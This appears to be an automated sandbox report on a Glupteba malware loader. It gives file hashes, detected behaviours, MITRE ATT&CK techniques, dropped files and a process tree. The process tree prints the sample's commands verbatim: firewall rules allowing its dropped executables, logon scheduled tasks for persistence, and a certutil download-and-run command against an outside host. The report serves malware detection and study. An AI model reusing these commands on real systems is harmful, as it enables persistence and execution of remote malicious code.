Analysis

  • max time kernel
    153s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    09-05-2022 00:36

General

  • Target

    18ee6f46fdab9f9f508bebe827d00d9a725639457cc3e1638a13cd905999772b.exe

  • Size

    3.9MB

  • MD5

    4f0898d549720a99de306bd1fceafd22

  • SHA1

    e505b0ce2ad3918f71fa9e060557a92e1b7a48bc

  • SHA256

    18ee6f46fdab9f9f508bebe827d00d9a725639457cc3e1638a13cd905999772b

  • SHA512

    5faa950f4b9aeb67cc1fcd72990fd78f889a837479edc6b4b206d4c70b3a12b66e265e448ce60a352e8626cfcf6594d65277e4cad698077c2a3fe4f9169d18ba

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 6 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\18ee6f46fdab9f9f508bebe827d00d9a725639457cc3e1638a13cd905999772b.exe
    "C:\Users\Admin\AppData\Local\Temp\18ee6f46fdab9f9f508bebe827d00d9a725639457cc3e1638a13cd905999772b.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4356
    • C:\Users\Admin\AppData\Local\Temp\18ee6f46fdab9f9f508bebe827d00d9a725639457cc3e1638a13cd905999772b.exe
      "C:\Users\Admin\AppData\Local\Temp\18ee6f46fdab9f9f508bebe827d00d9a725639457cc3e1638a13cd905999772b.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1392
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:3768
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1552
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac.exe" enable=yes
            4⤵
              PID:1212
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1616
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:4292
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:3552
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:4744
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:3592
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:752

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.9MB

        MD5

        4f0898d549720a99de306bd1fceafd22

        SHA1

        e505b0ce2ad3918f71fa9e060557a92e1b7a48bc

        SHA256

        18ee6f46fdab9f9f508bebe827d00d9a725639457cc3e1638a13cd905999772b

        SHA512

        5faa950f4b9aeb67cc1fcd72990fd78f889a837479edc6b4b206d4c70b3a12b66e265e448ce60a352e8626cfcf6594d65277e4cad698077c2a3fe4f9169d18ba

      • C:\Windows\rss\csrss.exe
        Filesize

        3.9MB

        MD5

        4f0898d549720a99de306bd1fceafd22

        SHA1

        e505b0ce2ad3918f71fa9e060557a92e1b7a48bc

        SHA256

        18ee6f46fdab9f9f508bebe827d00d9a725639457cc3e1638a13cd905999772b

        SHA512

        5faa950f4b9aeb67cc1fcd72990fd78f889a837479edc6b4b206d4c70b3a12b66e265e448ce60a352e8626cfcf6594d65277e4cad698077c2a3fe4f9169d18ba

      • memory/1212-140-0x0000000000000000-mapping.dmp
      • memory/1392-137-0x0000000000000000-mapping.dmp
      • memory/1552-139-0x0000000000000000-mapping.dmp
      • memory/1616-145-0x0000000005F00000-0x00000000065FC000-memory.dmp
        Filesize

        7.0MB

      • memory/1616-141-0x0000000000000000-mapping.dmp
      • memory/1616-146-0x0000000000400000-0x0000000005157000-memory.dmp
        Filesize

        77.3MB

      • memory/1616-144-0x0000000005B00000-0x0000000005EA9000-memory.dmp
        Filesize

        3.7MB

      • memory/1976-134-0x00000000056AB000-0x0000000005A54000-memory.dmp
        Filesize

        3.7MB

      • memory/1976-136-0x0000000000400000-0x0000000005157000-memory.dmp
        Filesize

        77.3MB

      • memory/1976-133-0x0000000000000000-mapping.dmp
      • memory/1976-135-0x0000000005A60000-0x000000000615C000-memory.dmp
        Filesize

        7.0MB

      • memory/3552-148-0x0000000000000000-mapping.dmp
      • memory/3592-151-0x0000000000000000-mapping.dmp
      • memory/3768-138-0x0000000000000000-mapping.dmp
      • memory/4292-147-0x0000000000000000-mapping.dmp
      • memory/4356-132-0x0000000000400000-0x0000000005157000-memory.dmp
        Filesize

        77.3MB

      • memory/4356-130-0x0000000005871000-0x0000000005C1A000-memory.dmp
        Filesize

        3.7MB

      • memory/4356-131-0x0000000005C20000-0x000000000631C000-memory.dmp
        Filesize

        7.0MB

      • memory/4744-149-0x0000000000000000-mapping.dmp